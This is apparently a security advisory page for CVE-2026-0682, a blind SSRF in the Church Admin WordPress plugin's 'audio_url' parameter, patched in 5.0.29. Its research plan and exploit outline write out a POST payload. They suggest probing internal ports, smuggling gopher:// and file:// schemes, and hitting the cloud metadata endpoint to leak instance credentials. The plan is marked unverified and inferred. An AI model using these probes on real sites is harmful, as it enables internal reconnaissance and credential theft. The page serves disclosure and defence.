WP-Safety
CVE-2026-0682

Church Admin <= 5.0.28 - Authenticated (Administrator+) Blind Server-Side Request Forgery via 'audio_url' Parameter

lowServer-Side Request Forgery (SSRF)
2.2
CVSS Score
2.2
CVSS Score
low
Severity
5.0.29
Patched in
1d
Time to patch

Description

The Church Admin plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.0.28 due to insufficient validation of user-supplied URLs in the 'audio_url' parameter. This makes it possible for authenticated attackers, with Administrator-level access, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
High
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=5.0.28
PublishedJanuary 16, 2026
Last updatedJanuary 17, 2026
Affected pluginchurch-admin

Source Code

WordPress.org SVN
Vulnerable v5.0.28
Browse source Download .zip
Patched v5.0.29
Browse source Download .zip
Research Plan
Unverified

This research plan provides a technical roadmap for exploiting the Blind Server-Side Request Forgery (SSRF) vulnerability in the **Church Admin** plugin (CVE-2026-0682). --- ### 1. Vulnerability Summary The Church Admin plugin (<= 5.0.28) fails to properly validate the `audio_url` parameter when p…

Show full research plan

This research plan provides a technical roadmap for exploiting the Blind Server-Side Request Forgery (SSRF) vulnerability in the Church Admin plugin (CVE-2026-0682).

1. Vulnerability Summary

The Church Admin plugin (<= 5.0.28) fails to properly validate the audio_url parameter when processing sermon entries. An authenticated administrator can provide an arbitrary internal or external URL, which the server will attempt to fetch (likely to retrieve file size, duration, or metadata). Because the response from the remote server is not directly returned to the user, this is a Blind SSRF.

2. Attack Vector Analysis

  • Vulnerable Endpoint: wp-admin/admin.php?page=church_admin/index.php&section=sermons&action=edit-sermon (or similar sermon creation/edit endpoint).
  • Action Hook: Likely handled via admin_init or a specific page handler in the Church Admin plugin.
  • Vulnerable Parameter: audio_url
  • Authentication Required: Administrator level privileges.
  • Precondition: The plugin must be active, and the attacker must have access to the Sermon management section.

3. Code Flow (Inferred)

  1. Entry Point: The administrator navigates to the "Sermons" section of the Church Admin menu and clicks "Add Sermon" or "Edit Sermon".
  2. Form Submission: A POST request is sent to wp-admin/admin.php with the audio_url parameter.
  3. Vulnerable Sink: The plugin likely calls a function such as church_admin_get_remote_file_size() or uses wp_remote_get() / wp_remote_head() directly on the audio_url without verifying if the host is a public IP address or if the scheme is restricted to HTTP/HTTPS.
  4. SSRF Execution: The WordPress server originates a request to the attacker-supplied URL (e.g., http://127.0.0.1:22 or http://169.254.169.254/).

4. Nonce Acquisition Strategy

The Church Admin plugin uses standard WordPress admin form nonces.

  1. Identify the Page: The sermon edit/add page is located at:
    wp-admin/admin.php?page=church_admin/index.php&section=sermons&action=edit-sermon
  2. Navigate and Extract:
    • Use browser_navigate to reach the sermon creation page.
    • Use browser_eval to extract the nonce value from the form.
    • JS Variable/Field: Look for document.querySelector('input[name="church_admin_nonce"]').value or document.querySelector('#church_admin_sermon_form [name="_wpnonce"]').value. (Inferred field name: church_admin_nonce).

5. Exploitation Strategy

We will perform a blind SSRF to confirm the vulnerability by attempting to hit an internal service or a local port.

Step 1: Environment Setup

  • Ensure Church Admin <= 5.0.28 is installed.
  • Login as an Administrator.

Step 2: Probe for SSRF

  • Target: http://127.0.0.1:80 (The WordPress instance itself).
  • Payload:
    POST /wp-admin/admin.php?page=church_admin/index.php&section=sermons&action=edit-sermon HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Cookie: [Admin Cookies]

church_admin_nonce=[NONCE]&save_sermon=1&audio_url=http://127.0.0.1:80/&file_title=SSRF_Test&sermon_date=2024-01-01

Step 3: Verification of Blind SSRF
Since the response is blind, we use timing or state changes:

  1. Timing Attack: Use an internal IP that is known to be non-responsive (e.g., 10.0.0.1) and compare response time to a known open port (127.0.0.1:80).
  2. Access Logs: Check the WordPress access logs (/var/log/apache2/access.log) to see if the server made a request to itself.

6. Test Data Setup

  1. Plugin Installation: wp plugin install church-admin --version=5.0.28 --activate
  2. Admin User: Ensure a user with administrator role exists.
  3. Sermon Category: Some versions require a sermon category to exist before adding a sermon.
    • wp eval "church_admin_create_default_data();" (If function exists) or manually create a category via the UI.

7. Expected Results

  • Successful Exploitation: The WordPress server makes an outbound HTTP request to the URL specified in audio_url.
  • Blind Confirmation: The request takes significantly longer when targeting a closed/filtered internal port vs. an open port, or a hit is recorded in the server's own access logs if 127.0.0.1 is used.

8. Verification Steps

After the HTTP request, use WP-CLI to check if the sermon was saved with the malicious URL (confirming the sink was reached):

wp db query "SELECT option_value FROM wp_options WHERE option_name = 'church_admin_sermons'"
# Or check the specific table if the plugin uses a custom table
wp db query "SELECT audio_url FROM wp_church_admin_sermon WHERE file_title = 'SSRF_Test'"

9. Alternative Approaches

  • OOB (Out-of-Band): If the environment allows external DNS/HTTP, use a webhook.site or interactsh URL.
  • Protocol Smuggling: Test if schemes other than http are supported, such as gopher:// or file://.
  • Metadata Services: If running in AWS/GCP, attempt to hit http://169.254.169.254/latest/meta-data/ to leak instance credentials.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Church Admin plugin for WordPress is vulnerable to Blind Server-Side Request Forgery (SSRF) in versions up to 5.0.28 due to insufficient validation of the 'audio_url' parameter during sermon creation and editing. This vulnerability allows authenticated administrators to force the server to make requests to arbitrary internal or external locations, potentially exposing sensitive information from internal network services or cloud metadata endpoints.

Exploit Outline

1. Authenticate as a WordPress Administrator and navigate to the sermon management interface (e.g., admin.php?page=church_admin/index.php&section=sermons&action=edit-sermon). 2. Extract the security nonce (church_admin_nonce) and other required form fields from the sermon creation page. 3. Construct a POST request to the sermon saving action, setting the 'audio_url' parameter to a target internal URL (e.g., http://127.0.0.1:22 for port scanning or http://169.254.169.254/latest/meta-data/ for cloud environments). 4. Submit the request and observe the server's behavior. Since the SSRF is blind, confirmation is typically achieved by monitoring for outbound traffic at an attacker-controlled endpoint or by performing timing analysis to identify differences between open and closed internal ports.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/77227fc5-7c38-476d-af4c-4b2ad3dd8420?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database